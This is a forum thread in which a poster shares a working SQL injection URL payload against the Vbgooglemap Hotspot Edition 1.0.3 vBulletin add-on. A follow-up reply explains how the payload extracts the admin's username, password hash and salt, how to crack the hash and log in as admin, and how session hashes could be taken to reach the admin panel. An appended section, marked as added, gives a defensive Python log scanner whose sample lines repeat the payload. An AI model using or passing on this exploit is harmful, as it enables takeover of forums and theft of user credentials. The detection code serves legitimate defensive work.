Vbgooglemap Hotspot Edition <= 1.0.3 (vbulletin hack) SQL Injection

.v0id

New Member
Code:
###################################################
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
###################################################
# Keep This priv8 !

# Bug:

# [Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1/**/UNION/**/SELECT/**/0,1,password,salt,username,5,6,7,8,9,10,11,12,13/**/FROM/**/user/*

###################################################
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
###################################################
 

Morpheus

New Member
This is an exploit in the hack Vbgooglemap Hotspot Edition 1.0.3; if you know how to use it, you can hack some boards with it :)
 

.v0id

New Member
SpeedRazors said:
And how do I use this hack :) Please explain what to do with this code above.
It's a very simple SQL injection hack; the following code:
Code:
-1/**/UNION/**/SELECT/**/0,1,password,salt,username,5,6,7,8,9,10,11,12,13/**/FROM/**/user/*

pulls out the username and the encoded password with salt from the user with id 1.

What you have to do next is to decode the password with some tool and log in as admin.

What you could do is to pull out a session hash that would allow you to log in on the last admin session (if the session was allowed to go to admincp, then you have full access); however, you need to change the query to get this.
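
For defenders checking web logs for this issue, an added example (not part of the thread or of the hack's own code): a Python scan that flags requests to vbgooglemaphse.php whose mapid is not a plain integer, treating /**/ as the whitespace it stands in for in the posted string. The log lines are constructed, and the function names and the assumption that a legitimate mapid is a non-negative integer belong to this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

SCRIPT = "/vbgooglemaphse.php"  # script named in the thread
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.S)  # also an unterminated trailing /*

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=-1/**/UNION/**/SELECT/**/0,1,password,salt,username,5,6,7,8,9,10,11,12,13/**/FROM/**/user/* HTTP/1.1" 200 4211',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1 HTTP/1.1" 200 4198',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /forum/showthread.php?t=union+select HTTP/1.1" 200 900',
    '198.51.100.8 - - [01/Jan/2024:10:00:15 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=12%27 HTTP/1.1" 200 310',
]

def decode_fully(value, rounds=3):
    """Undo nested URL-encoding, bounded so a hostile value cannot loop us."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_mapid(raw):
    """Return 'ok', 'sqli_union' or 'non_numeric' for one mapid value."""
    value = decode_fully(raw)
    if re.fullmatch(r"[0-9]+", value):  # assumption: a real mapid is a plain integer
        return "ok"
    # Treat SQL comments as whitespace, then look for the UNION SELECT shape.
    flat = re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value)).lower()
    return "sqli_union" if re.search(r"\bunion\b.*\bselect\b", flat) else "non_numeric"

def scan(lines):
    """Return (line_number, verdict) for every suspicious mapid sent to the script."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(SCRIPT):
            continue
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            if key == "mapid" and classify_mapid(raw) != "ok":
                hits.append((number, classify_mapid(raw)))
    return hits

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Any non-numeric mapid is reported even when the UNION pattern does not match, so the integer check, not the keyword match, is what the scan relies on.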
 